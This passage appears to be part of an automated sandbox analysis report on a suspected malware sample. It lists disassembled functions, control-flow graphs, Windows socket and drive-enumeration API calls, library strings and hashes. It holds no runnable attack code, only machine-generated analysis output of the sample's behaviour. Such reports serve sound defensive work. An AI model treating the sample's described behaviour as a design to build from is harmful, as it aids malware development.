                                                      • Associated: 00000000.00000002.1396196650.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396213416.000000000101B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: CloseEnumOpen
                                                      • String ID: d
                                                      • API String ID: 1332880857-2564639436
                                                      • Opcode ID: 9ecfb9d26f3533ab420c80da2b897976bbf0060522607bd7b9c4605e27e41892
                                                      • Instruction ID: cd5d36709c6ce8078ec6bb15565a0fe0a5196efb3fc54f63120671b9a17fc14b
                                                      • Opcode Fuzzy Hash: 9ecfb9d26f3533ab420c80da2b897976bbf0060522607bd7b9c4605e27e41892
                                                      • Instruction Fuzzy Hash: 9371B3B4904319DFDB10EF69C58479EBBF0BF84318F10886DE89897351E7749A888F92
                                                      Function 004D76A0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 73networkCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1510 4d76a0-4d76be 1511 4d76e6-4d76f2 send 1510->1511 1512 4d76c0-4d76c7 1510->1512 1513 4d775e-4d7762 1511->1513 1514 4d76f4-4d7709 call 4d72a0 1511->1514 1512->1511 1515 4d76c9-4d76d1 1512->1515 1514->1513 1517 4d770b-4d7759 call 4d72a0 call 4dcb20 call 858c50 1515->1517 1518 4d76d3-4d76e4 1515->1518 1517->1513 1518->1514
                                                      APIs
                                                      • send.WS2_32(multi.c,?,?,?,N=M,00000000,?,?,004E07BF), ref: 004D76EB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1395232706.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1395188158.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395751582.0000000000AE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000C6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396065369.0000000000E68000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396176817.0000000001018000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396196650.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396213416.000000000101B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: send
                                                      • String ID: LIMIT %s:%d %s reached memlimit$N=M$SEND %s:%d send(%lu) = %ld$multi.c$send
                                                      • API String ID: 2809346765-2691544196
                                                      • Opcode ID: eb2afd0ae4cac2f8327d7bd5aa321682680d5cbad91d7725ad77818414ae2371
                                                      • Instruction ID: 4f0301e75c78507f0b5685a66c84304b7f5f9d4d56be5d4425b9c6d17649abce
                                                      • Opcode Fuzzy Hash: eb2afd0ae4cac2f8327d7bd5aa321682680d5cbad91d7725ad77818414ae2371
                                                      • Instruction Fuzzy Hash: E7110AF1A09344BFD520AB59AC5AD277BACDBC1B6CF44091BF80563342F5A5DC0187B6
                                                      Function 00509290 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 146networkCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1629 509290-5092ed call 4d76a0 1632 5093c3-5093ce 1629->1632 1633 5092f3-5092fb 1629->1633 1642 5093d0-5093e1 1632->1642 1643 5093e5-509427 call 4ed090 call 514f40 1632->1643 1634 509301-509333 call 4ed8c0 call 4ed9a0 1633->1634 1635 5093aa-5093af 1633->1635 1653 509335-509364 WSAIoctl 1634->1653 1654 5093a7 1634->1654 1636 5093b5-5093bc 1635->1636 1637 509456-509470 1635->1637 1640 509429-509431 1636->1640 1641 5093be 1636->1641 1647 509433-509437 1640->1647 1648 509439-50943f 1640->1648 1641->1637 1642->1636 1649 5093e3 1642->1649 1643->1637 1643->1640 1647->1637 1647->1648 1648->1637 1652 509441-509453 call 5150a0 1648->1652 1649->1637 1652->1637 1657 509366-50936f 1653->1657 1658 50939b-5093a4 1653->1658 1654->1635 1657->1658 1661 509371-509390 setsockopt 1657->1661 1658->1654 1661->1658 1662 509392-509395 1661->1662 1662->1658
                                                      APIs
                                                      • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 0050935D
                                                      • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 00509388
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1395232706.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1395188158.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395751582.0000000000AE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000C6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396065369.0000000000E68000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396176817.0000000001018000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396196650.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396213416.000000000101B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: Ioctlsetsockopt
                                                      • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                                      • API String ID: 1903391676-2691795271
                                                      • Opcode ID: 1f36c80e4ddf52394f4a7437a3d71b20c8ab476e6a4cf6e641e2f297380e30aa
                                                      • Instruction ID: 2c16a2a617d917bd84b43416a33b381d499c41c0bcd7bedbd55ae362d508bff4
                                                      • Opcode Fuzzy Hash: 1f36c80e4ddf52394f4a7437a3d71b20c8ab476e6a4cf6e641e2f297380e30aa
                                                      • Instruction Fuzzy Hash: 1451D370604305ABDB11DF24C885FAABBA5FF84318F148529FD489B2C7E770E951CB91
                                                      Function 0085D1B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 399COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1663 85d1b0-85d261 call 858d18 1666 85d397-85d3a1 1663->1666 1667 85d267-85d26e 1663->1667 1668 85d2ba-85d2bd 1667->1668 1669 85d270-85d281 1668->1669 1670 85d2bf-85d2e5 1668->1670 1673 85d283-85d28a 1669->1673 1674 85d28c-85d296 1669->1674 1671 85d390 1670->1671 1672 85d2eb-85d304 1670->1672 1671->1666 1675 85d306-85d312 1672->1675 1673->1674 1676 85d29f-85d2a2 1673->1676 1677 85d320-85d327 call 858c68 1674->1677 1678 85d29c 1674->1678 1679 85d314-85d317 1675->1679 1680 85d338-85d33d 1675->1680 1682 85d2a9-85d2b4 1676->1682 1696 85d32c 1677->1696 1678->1676 1679->1677 1679->1680 1683 85d4c4-85d4d7 call 85b620 1679->1683 1684 85d4a6-85d4a8 1679->1684 1685 85d686-85d68f 1679->1685 1686 85d600-85d60a 1679->1686 1687 85d6e0-85d715 call 85b680 1679->1687 1688 85d5e2-85d5e4 1679->1688 1689 85d58d-85d58f 1679->1689 1690 85d5c9-85d5cc 1679->1690 1691 85d48b-85d48d 1679->1691 1692 85d5ab-85d5ad 1679->1692 1693 85d550-85d556 1679->1693 1694 85d6b3-85d6bc 1679->1694 1695 85d4dc-85d4de 1679->1695 1697 85d343-85d346 1680->1697 1698 85dacb-85dae0 call 85b620 1680->1698 1682->1668 1682->1671 1683->1682 1702 85d380-85d384 1684->1702 1712 85d4ae-85d4bf 1684->1712 1713 85d695-85d6ae call 85c9a0 1685->1713 1714 85da2c-85da45 call 85c9a0 1685->1714 1708 85d610-85d623 1686->1708 1709 85d8b2-85d8c7 1686->1709 1687->1682 1706 85dab1-85dab4 1688->1706 1707 85d5ea-85d5fb 1688->1707 1701 85d595-85d5a6 1689->1701 1689->1702 1699 85d5d2-85d5dd 1690->1699 1704 85db9c-85dbbd 1690->1704 1691->1702 1711 85d493-85d4a1 1691->1711 1692->1702 1703 85d5b3-85d5c4 1692->1703 1693->1699 1700 85d558-85d55e 1693->1700 1716 85d6c2-85d6db call 85ca30 1694->1716 1717 85d9be-85d9ce call 85ca30 1694->1717 1695->1702 1718 85d4e4-85d52f localeconv call 867890 1695->1718 1696->1676 1697->1698 1705 85d34c-85d34e 1697->1705 1698->1682 1724 85d386-85d388 1699->1724 1722 85dae5-85daf8 1700->1722 1723 85d564-85d572 1700->1723 1701->1724 1702->1724 1703->1724 1704->1724 1726 85d354-85d35f 1705->1726 1727 85dabb-85dac6 1705->1727 1706->1698 1731 85dab6 1706->1731 1707->1724 1729 85db7c-85db7e 1708->1729 1730 85d629-85d637 1708->1730 1720 85db80-85db82 1709->1720 1721 85d8cd-85d8dd 1709->1721 1711->1724 1712->1724 1713->1682 1714->1682 1716->1682 1742 85d9d3-85d9d7 1717->1742 1760 85d531-85d536 1718->1760 1761 85d53e-85d54b 1718->1761 1750 85db84-85db97 call 85b9b0 1720->1750 1738 85d8df-85d8e2 1721->1738 1739 85d8e9-85d8f8 1721->1739 1722->1724 1740 85dcb8-85dcba 1723->1740 1741 85d578-85d588 1723->1741 1724->1675 1747 85d38e 1724->1747 1726->1702 1743 85d361-85d369 1726->1743 1729->1750 1745 85d643-85d650 1730->1745 1746 85d639-85d63c 1730->1746 1731->1727 1738->1739 1752 85d8fe-85d90f 1739->1752 1753 85dc7a-85dc94 call 85b9b0 1739->1753 1754 85dcd3-85dcf3 1740->1754 1755 85dcbc-85dcc7 1740->1755 1741->1724 1742->1682 1756 85db6c-85db77 1743->1756 1757 85d36f-85d37c 1743->1757 1758 85d656-85d667 1745->1758 1759 85dc99-85dcb3 call 85b9b0 1745->1759 1746->1745 1747->1671 1763 85d915-85d91a 1752->1763 1764 85dc61-85dc6a 1752->1764 1753->1759 1754->1724 1755->1754 1756->1724 1757->1702 1767 85dafd-85db06 1758->1767 1768 85d66d-85d681 call 85cc70 1758->1768 1759->1742 1760->1761 1761->1724 1770 85d920-85d95a call 85cc70 1763->1770 1771 85db3c-85db3f 1763->1771 1764->1753 1767->1771 1768->1742 1770->1742 1771->1764 1777 85db45 1771->1777 1777->1756
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1395232706.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1395188158.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395751582.0000000000AE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000C6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396065369.0000000000E68000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396176817.0000000001018000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396196650.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396213416.000000000101B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$Inf$NaN
                                                      • API String ID: 0-141429178
                                                      • Opcode ID: 54bdcd825961c6b79a6f66b4e5f6e9561378d80092b7bbcbd22e45b604535362
                                                      • Instruction ID: a4f139d5ed4c4541d005d1d72410d3a9e674c3d54aa553f049fbe98897b3e0fe
                                                      • Opcode Fuzzy Hash: 54bdcd825961c6b79a6f66b4e5f6e9561378d80092b7bbcbd22e45b604535362
                                                      • Instruction Fuzzy Hash: EEF18C7160C3958BD7319F24C0407ABBBE2FB85316F158A6DECD9C7382D735990A8B82
                                                      Function 004D7770 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73networkCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1779 4d7770-4d778e 1780 4d77b6-4d77c2 recv 1779->1780 1781 4d7790-4d7797 1779->1781 1783 4d782e-4d7832 1780->1783 1784 4d77c4-4d77d9 call 4d72a0 1780->1784 1781->1780 1782 4d7799-4d77a1 1781->1782 1785 4d77db-4d7829 call 4d72a0 call 4dcb20 call 858c50 1782->1785 1786 4d77a3-4d77b4 1782->1786 1784->1783 1785->1783 1786->1784
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1395232706.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1395188158.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395751582.0000000000AE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000C6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396065369.0000000000E68000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396176817.0000000001018000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396196650.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396213416.000000000101B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: recv
                                                      • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                                      • API String ID: 1507349165-640788491
                                                      • Opcode ID: 59e5f771d06ffd3647e6ff3d63db6df5609d43a5a53032110fec693f142cf49e
                                                      • Instruction ID: 3d81d6cb7eb477474f6c539baef5a669f711b2f8fe3df6c9336151252bfe0349
                                                      • Opcode Fuzzy Hash: 59e5f771d06ffd3647e6ff3d63db6df5609d43a5a53032110fec693f142cf49e
                                                      • Instruction Fuzzy Hash: 041127B4A09344BBD120EB199C5AE377B9CDBC5B6CF44492BF80593342F165AC0182B2
                                                      Function 004D75E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66networkCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1798 4d75e0-4d75ed 1799 4d75ef-4d75f6 1798->1799 1800 4d7607-4d7629 socket 1798->1800 1799->1800 1801 4d75f8-4d75ff 1799->1801 1802 4d763f-4d7642 1800->1802 1803 4d762b-4d763c call 4d72a0 1800->1803 1804 4d7601-4d7602 1801->1804 1805 4d7643-4d7699 call 4d72a0 call 4dcb20 call 858c50 1801->1805 1803->1802 1804->1800
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1395232706.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1395188158.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395751582.0000000000AE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000C6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396065369.0000000000E68000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396176817.0000000001018000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396196650.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396213416.000000000101B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: socket
                                                      • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                                      • API String ID: 98920635-842387772
                                                      • Opcode ID: 77479ab8efc35e9f471b974b8da7932ebc594810aae2d20f8d81ae4a6b198af3
                                                      • Instruction ID: 288376ad4e6c2f3b39cb938c3bfb348afbcf0e9330972f4b0b64ba7fce425217
                                                      • Opcode Fuzzy Hash: 77479ab8efc35e9f471b974b8da7932ebc594810aae2d20f8d81ae4a6b198af3
                                                      • Instruction Fuzzy Hash: 3A118CB1B01211A7DA206B6D6C26E9B3B98DFC1778F440927F800D3392F262CC54C3E1
                                                      Function 071502F2 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 316COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1907 71502f2-7150469 GetLogicalDrives 1924 715046a-71506c8 call 71506d8 1907->1924 1951 715071b-715071f 1924->1951 1952 71506ca-71506d7 1924->1952 1954 7150726-715075b 1951->1954 1955 7150721-7150725 1951->1955 1955->1954
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE(?,07150081,07150081), ref: 07150462
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1397951528.0000000007150000.00000040.00001000.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7150000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\$A:\
                                                      • API String ID: 999431828-1047444362
                                                      • Opcode ID: a8ec3d381e852b3609dd84c16903f9e4ed0f91f63c4cd11cbdd56b72651742b3
                                                      • Instruction ID: 032cc638cbac0e380e201eea28e780d49604f750b2e5763b40b874edd2cde302
                                                      • Opcode Fuzzy Hash: a8ec3d381e852b3609dd84c16903f9e4ed0f91f63c4cd11cbdd56b72651742b3
                                                      • Instruction Fuzzy Hash: FD516AEB26C121FDB14985E62B54AFB576DE2DB730B32882BFC27D1582E3884E495131
                                                      Function 071502F0 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 301COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1958 71502f0-7150469 GetLogicalDrives 1975 715046a-71506c8 call 71506d8 1958->1975 2002 715071b-715071f 1975->2002 2003 71506ca-71506d7 1975->2003 2005 7150726-715075b 2002->2005 2006 7150721-7150725 2002->2006 2006->2005
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE(?,07150081,07150081), ref: 07150462
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1397951528.0000000007150000.00000040.00001000.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7150000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\$A:\
                                                      • API String ID: 999431828-1047444362
                                                      • Opcode ID: f96c8bda7fa665ad8934a24c17a5fd3101531ee03943fcc8b020e13f2770f5ae
                                                      • Instruction ID: 33a2a4cfe920f7819cbbb9a1f2b04a132fb57cfac701e59a668fd3a04b2a9ac8
                                                      • Opcode Fuzzy Hash: f96c8bda7fa665ad8934a24c17a5fd3101531ee03943fcc8b020e13f2770f5ae
                                                      • Instruction Fuzzy Hash: 83516BEB26C121FDB14A85E62B14AFB576DE5CB730B32842AFC17D1582E3984F4D1131
                                                      Function 07150304 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 295COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 2009 7150304-7150469 GetLogicalDrives 2026 715046a-71506c8 call 71506d8 2009->2026 2053 715071b-715071f 2026->2053 2054 71506ca-71506d7 2026->2054 2056 7150726-715075b 2053->2056 2057 7150721-7150725 2053->2057 2057->2056
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE(?,07150081,07150081), ref: 07150462
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1397951528.0000000007150000.00000040.00001000.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7150000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\$A:\
                                                      • API String ID: 999431828-1047444362
                                                      • Opcode ID: a040d5670bdf26481c166de3b54c90b68a28f2db7903300bb1b1e4fd74fe6638
                                                      • Instruction ID: d93300249991a6e3bb05a55cae5342baa47a0de720a89b8fec5f0ddd08c1e550
                                                      • Opcode Fuzzy Hash: a040d5670bdf26481c166de3b54c90b68a28f2db7903300bb1b1e4fd74fe6638
                                                      • Instruction Fuzzy Hash: 47515BEB26C121FDB14985E22B14AFB576DE6DB730B32882AFC27D5582E3984F4D1131
                                                      Function 07150315 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 294COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE(?,07150081,07150081), ref: 07150462
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1397951528.0000000007150000.00000040.00001000.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7150000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\$A:\
                                                      • API String ID: 999431828-1047444362
                                                      • Opcode ID: f22184f73f60266730cadf69355ecab723efe577ec348299ed3b5e44428581f1
                                                      • Instruction ID: a31042a251978ea6c711eb4b8729c7bc265eca4e80af50cd5121089e2fe11003
                                                      • Opcode Fuzzy Hash: f22184f73f60266730cadf69355ecab723efe577ec348299ed3b5e44428581f1
                                                      • Instruction Fuzzy Hash: 63517CEB268111FDB14985E22B14AFB576DE6DB730B32882AFC27D6582E3984F4D1131
                                                      Function 0050A150 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • getsockname.WS2_32(?,?,00000080), ref: 0050A1C7
                                                      Strings
                                                      • getsockname() failed with errno %d: %s, xrefs: 0050A1F0
                                                      • ssloc inet_ntop() failed with errno %d: %s, xrefs: 0050A23B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1395232706.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1395188158.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395751582.0000000000AE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000C6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
